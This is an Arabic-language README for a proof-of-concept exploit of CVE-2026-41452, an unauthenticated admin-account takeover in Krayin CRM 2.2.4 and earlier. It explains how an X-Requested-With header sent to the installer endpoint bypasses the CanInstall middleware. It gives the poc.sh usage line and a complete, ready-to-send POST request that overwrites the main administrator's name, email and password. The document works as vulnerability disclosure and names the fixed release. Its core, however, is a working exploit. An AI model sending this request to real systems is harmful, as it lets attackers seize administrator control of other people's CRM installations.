
إثبات مفهوم استغلال لـ CVE-2026-41452، وهو تجاوز حرج للمصادقة في Krayin CRM <= 2.2.4 يسمح بالاستيلاء على حساب المسؤول دون مصادقة عبر تجاوز البرمجيات الوسيطة.
إثبات مفهوم (PoC) يوضح ثغرة حرجة تتعلق بغياب المصادقة (CVE-2026-41452) تؤثر على Krayin CRM الإصدار 2.2.4 والإصدارات الأقدم.
تسمح هذه الثغرة للمهاجمين عن بُعد غير المصادق عليهم بتجاوز منطق middleware الخاص بالتثبيت في التطبيق (CanInstall) عبر حقن ترويسات HTTP محددة، مما يؤدي إلى استبدال كامل لإعدادات حساب المسؤول الرئيسي.
[!WARNING]
إخلاء المسؤولية: هذا المستودع والمعلومات الواردة فيه مُقدَّمة حصريًا لأغراض تعليمية، والبحث الأمني، والتدقيق الدفاعي المصرح به. يُعد الاختبار أو الاستغلال غير المصرح به لأنظمة الحاسوب غير قانوني بشكل صارم. لا يتحمل المؤلف أي مسؤولية عن أي إساءة استخدام لهذه المواد.
معرّف CVE: CVE-2026-41452
نوع الثغرة: غياب المصادقة / تجاوز Middleware
حرجة (CVSS 9.8)
البرنامج المتأثر: Krayin CRM <= 2.2.4
الإصدار المُصحَّح: Krayin CRM >= 2.2.5
تكمن الثغرة في middleware الإعداد الخاص بالتطبيق. يمكن لمهاجم غير مصادق عليه إضافة ترويسة X-Requested-With: XMLHttpRequest إلى حمولة مُصمَّمة تستهدف نقطة النهاية /install/api/admin-config-setup. يؤدي هذا إلى تعطيل فحص إعادة التوجيه المتوقع داخل middleware CanInstall، مما يكشف عن عملية قاعدة بيانات updateOrInsert غير مصادق عليها تستهدف المعرّف الثابت (1) الخاص بمسؤول النظام الرئيسي.
شغّل السكربت ضد نسخة هدف مصرح لك باختبارها:
./poc.sh <TARGET-URL> <USERNAME> <EMAIL> <PASSWORD>
في الخلفية، يتم تفعيل التجاوز عبر بنية معاملة HTTP التالية:
POST /install/api/admin-config-setup HTTP/1.1
Host: target-crm.local
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
name=test1&[email protected]&password=Password123